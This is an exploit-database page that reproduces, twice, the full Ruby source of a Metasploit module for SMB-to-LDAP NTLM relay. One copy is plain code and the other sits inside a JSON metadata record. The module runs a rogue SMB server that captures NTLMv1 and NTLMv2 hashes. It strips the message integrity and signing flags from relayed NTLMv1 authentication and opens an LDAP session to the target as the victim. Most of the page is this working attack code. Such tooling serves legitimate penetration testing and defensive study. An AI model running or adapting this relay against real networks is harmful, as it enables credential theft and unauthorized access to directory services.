Microsoft Windows SMB to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_LDAP-

Description

This module supports running an SMB server which validates credentials, and then attempts to execute a relay attack against an LDAP server on the ...

Visit Original Source

Basic Information

ID MSF:AUXILIARY-SERVER-RELAY-SMB_TO_LDAP-

Published Aug 29, 2025 at 18:53

Modified Mar 17, 2025 at 18:52

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SMB::RelayServer
include Msf::Auxiliary::CommandShell

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft Windows SMB to LDAP Relay',
'Description' => %q{
This module supports running an SMB server which validates credentials, and
then attempts to execute a relay attack against an LDAP server on the
configured RHOSTS hosts.

It is not possible to relay NTLMv2 to LDAP due to the Message Integrity Check
(MIC). As a result, this will only work with NTLMv1. The module takes care of
removing the relevant flags to bypass signing.

If the relay succeeds, an LDAP session to the target will be created. This can
be used by any modules that support LDAP sessions, like `admin/ldap/rbcd` or
`auxiliary/gather/ldap_query`.

Supports SMBv2, SMBv3, and captures NTLMv1 as well as NTLMv2 hashes.
SMBv1 is not supported - please see https://github.com/rapid7/metasploit-framework/issues/16261
},
'Author' => [
'Spencer McIntyre', # This module & LDAP relay library
'Christophe De La Fuente' # This module & SMB relay updates
],
'License' => MSF_LICENSE,
'DefaultTarget' => 0,
'Actions' => [
[ 'CREATE_LDAP_SESSION', { 'Description' => 'Create an LDAP session' } ]
],
'PassiveActions' => [ 'CREATE_LDAP_SESSION' ],
'DefaultAction' => 'CREATE_LDAP_SESSION',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ IOC_IN_LOGS, ACCOUNT_LOCKOUTS ]
}
)
)

register_options(
[
Opt::RPORT(389)
]
)

register_advanced_options(
[
OptBool.new('RANDOMIZE_TARGETS', [true, 'Whether the relay targets should be randomized', true]),
OptInt.new('SessionKeepalive', [true, 'Time (in seconds) for sending protocol-level keepalive messages', 10 * 60])
]
)
end

def relay_targets
Msf::Exploit::Remote::SMB::Relay::TargetList.new(
:ldap, # TODO: look into LDAPs
datastore['RPORT'],
datastore['RHOSTS'],
datastore['TARGETURI'],
randomize_targets: datastore['RANDOMIZE_TARGETS'],
drop_mic_only: true,
drop_mic_and_sign_key_exch_flags: true
)
end

def check_options
unless framework.features.enabled?(Msf::FeatureManager::LDAP_SESSION_TYPE)
fail_with(Failure::BadConfig, 'This module requires the `ldap_session_type` feature to be enabled. Please enable this feature using `features set ldap_session_type true`')
end
end

def run
check_options

start_service
print_status('Server started.')

# Wait on the service to stop
service.wait if service
end

def on_relay_success(relay_connection:, relay_identity:)
print_good('Relay succeeded')
session_setup(relay_connection, relay_identity)
rescue StandardError => e
elog('Failed to setup the session', error: e)
end

# @param [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::LDAP::Client] relay_connection
# @return [Msf::Sessions::LDAP]
def session_setup(relay_connection, relay_identity)
client = relay_connection.create_ldap_client
ldap_session = Msf::Sessions::LDAP.new(
relay_connection.socket,
{
client: client,
keepalive_seconds: datastore['SessionKeepalive']
}
)
domain, _, username = relay_identity.partition('\\')
datastore_options = {
'DOMAIN' => domain,
'USERNAME' => username
}
start_session(self, nil, datastore_options, false, ldap_session.rstream, ldap_session)
end
end

{
    "lastseen": "2025-08-29T19:24:03",
    "description": "This module supports running an SMB server which validates credentials, and           then attempts to execute a relay attack against an LDAP server on the       ...",
    "published": "2025-08-29T18:53:31",
    "modified": "2025-03-17T18:52:10",
    "type": "metasploit",
    "title": "Microsoft Windows SMB to LDAP Relay",
    "source": "",
    "references": "",
    "id": "MSF:AUXILIARY-SERVER-RELAY-SMB_TO_LDAP-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n  include Msf::Exploit::Remote::SMB::RelayServer\n  include Msf::Auxiliary::CommandShell\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Microsoft Windows SMB to LDAP Relay',\n        'Description' => %q{\n          This module supports running an SMB server which validates credentials, and\n          then attempts to execute a relay attack against an LDAP server on the\n          configured RHOSTS hosts.\n\n          It is not possible to relay NTLMv2 to LDAP due to the Message Integrity Check\n          (MIC). As a result, this will only work with NTLMv1. The module takes care of\n          removing the relevant flags to bypass signing.\n\n          If the relay succeeds, an LDAP session to the target will be created. This can\n          be used by any modules that support LDAP sessions, like `admin/ldap/rbcd` or\n          `auxiliary/gather/ldap_query`.\n\n          Supports SMBv2, SMBv3, and captures NTLMv1 as well as NTLMv2 hashes.\n          SMBv1 is not supported - please see https://github.com/rapid7/metasploit-framework/issues/16261\n        },\n        'Author' => [\n          'Spencer McIntyre', # This module & LDAP relay library\n          'Christophe De La Fuente' # This module & SMB relay updates\n        ],\n        'License' => MSF_LICENSE,\n        'DefaultTarget' => 0,\n        'Actions' => [\n          [ 'CREATE_LDAP_SESSION', { 'Description' => 'Create an LDAP session' } ]\n        ],\n        'PassiveActions' => [ 'CREATE_LDAP_SESSION' ],\n        'DefaultAction' => 'CREATE_LDAP_SESSION',\n        'Notes' => {\n          'Stability' => [ CRASH_SAFE ],\n          'Reliability' => [ REPEATABLE_SESSION ],\n          'SideEffects' => [ IOC_IN_LOGS, ACCOUNT_LOCKOUTS ]\n        }\n      )\n    )\n\n    register_options(\n      [\n        Opt::RPORT(389)\n      ]\n    )\n\n    register_advanced_options(\n      [\n        OptBool.new('RANDOMIZE_TARGETS', [true, 'Whether the relay targets should be randomized', true]),\n        OptInt.new('SessionKeepalive', [true, 'Time (in seconds) for sending protocol-level keepalive messages', 10 * 60])\n      ]\n    )\n  end\n\n  def relay_targets\n    Msf::Exploit::Remote::SMB::Relay::TargetList.new(\n      :ldap, # TODO: look into LDAPs\n      datastore['RPORT'],\n      datastore['RHOSTS'],\n      datastore['TARGETURI'],\n      randomize_targets: datastore['RANDOMIZE_TARGETS'],\n      drop_mic_only: true,\n      drop_mic_and_sign_key_exch_flags: true\n    )\n  end\n\n  def check_options\n    unless framework.features.enabled?(Msf::FeatureManager::LDAP_SESSION_TYPE)\n      fail_with(Failure::BadConfig, 'This module requires the `ldap_session_type` feature to be enabled. Please enable this feature using `features set ldap_session_type true`')\n    end\n  end\n\n  def run\n    check_options\n\n    start_service\n    print_status('Server started.')\n\n    # Wait on the service to stop\n    service.wait if service\n  end\n\n  def on_relay_success(relay_connection:, relay_identity:)\n    print_good('Relay succeeded')\n    session_setup(relay_connection, relay_identity)\n  rescue StandardError => e\n    elog('Failed to setup the session', error: e)\n  end\n\n  # @param [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::LDAP::Client] relay_connection\n  # @return [Msf::Sessions::LDAP]\n  def session_setup(relay_connection, relay_identity)\n    client = relay_connection.create_ldap_client\n    ldap_session = Msf::Sessions::LDAP.new(\n      relay_connection.socket,\n      {\n        client: client,\n        keepalive_seconds: datastore['SessionKeepalive']\n      }\n    )\n    domain, _, username = relay_identity.partition('\\\\')\n    datastore_options = {\n      'DOMAIN' => domain,\n      'USERNAME' => username\n    }\n    start_session(self, nil, datastore_options, false, ldap_session.rstream, ldap_session)\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/relay/smb_to_ldap.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/auxiliary/server/relay/smb_to_ldap/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply